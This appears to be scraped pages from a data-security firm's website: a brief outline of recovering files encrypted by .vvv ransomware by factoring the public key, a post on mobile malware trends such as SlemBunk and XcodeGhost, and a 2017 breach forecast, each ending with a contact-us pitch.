    What do you need to collect to get this started? Collect an encrypted file from the attacked machine. Choose a file with a known initial magic number - is pre-configured for working with PDF files. Put all the files in a secure, and islolated folder. The file extension will be .vvv. Once you have these files, Run "python ." in the working folder. To factor the numbers in the encryption algorithim, run msieve -v -e 0x public key from Then wait....... Next you will need to edit, and add your public and private AES keys to the known_keys array. Repeat until all the found keys are cycled through. Finally, Run "python C:\" to decrypt your files.

    I don't want to provide details that will allow developers of maleware to reverse engineer the malware, so I will stop there. If you want more information or need to get services completed contact us.  Be aware that depending on the encryption and the processor power of the system this process can take, hours, days, or weeks.


Contact Us to Help !

Mobile Device Attacks

Mobile Attacks

In 2016, mobile malware attacks were on the rise from 2015 to 2016 we saw an increase of 61% in the number of these attacks. 

Malware Evolves?

Mobile malware is following a similar evolution. Beginning by attacking through downloaded apps to mobile devices, through SMS links, or other user approved links. It still targets and will always target user data. The attackers are now focusing on collecting banking information.

Popular Attacks

Popular attacks known as the SlemBunk attacks are examples of this evolution. Other similar attacks on IOS and Android devices, such as IOS xCode Ghost, and iBackdoor attacks further approve the evolution of malware.

What can you do?

How will you protect your data on mobile devices in 2016? You need a full services security software suite. This should protect your mobile device with the same diligence as your laptop or PC. You also need a service to proactively monitor, scan, and alert you of any malware stastics. 


Contact US to help !

2017 Attack Forecast

With a new year, brings new attacks.

As a data security firms, we  are working to stay one step ahead of the attackers in this evolving landscape, companies are trying to stay ahead too. Preparation for security breaches of any type are critical.

Not just IDS sees the future

Experian Data Breach Resolutions have released a projects of attacks forecast for 2016. While some current issues remain relevant, there are a few emerging areas that warrant attention. The areas of attack vectors have not changed. The cyber criminals are still after the most precious of company assets, the data. The reality of it, is that, no two data breaches are the same. It is an  evolving form malicious behavior.

Consumers will be impacted

Experian predicts that consumers and businesses will be collateral damage in cyber-conflicts among countries. As nation-states continue to move their conflicts and espionage efforts to the digital world, we likely will see more incidents aimed at stealing corporate and government secrets or disrupting military operations. Causing company exposure in the form of exposed information for millions of individuals or stolen business IP addresses. This is the new age of war fare. 

Our Predictions

Coming in 2017, predictions of a resurgence in hacktivist activities, motivated by the desire to effect reputational damage on a company or a cause. These groups are not after the data, but more along the characteristics of extortion. A companies security response plan, needs to have procedures in place to mitigate this type of exposure. They will utilzie ransomware to hold companies or users, forcing them to pay to recover the compromised data.

Be Proactive

The forecast for 2017 is focused on small attacks attempting to give the hacktivist organization fame. Healtcare and Credit Card hacks make big headlines, but small breaches will cause the most damage. With the presidential campaigns coming up, we at IDS would not be shocked if they become targets for these types of attacks.


Contact Us at IDSS!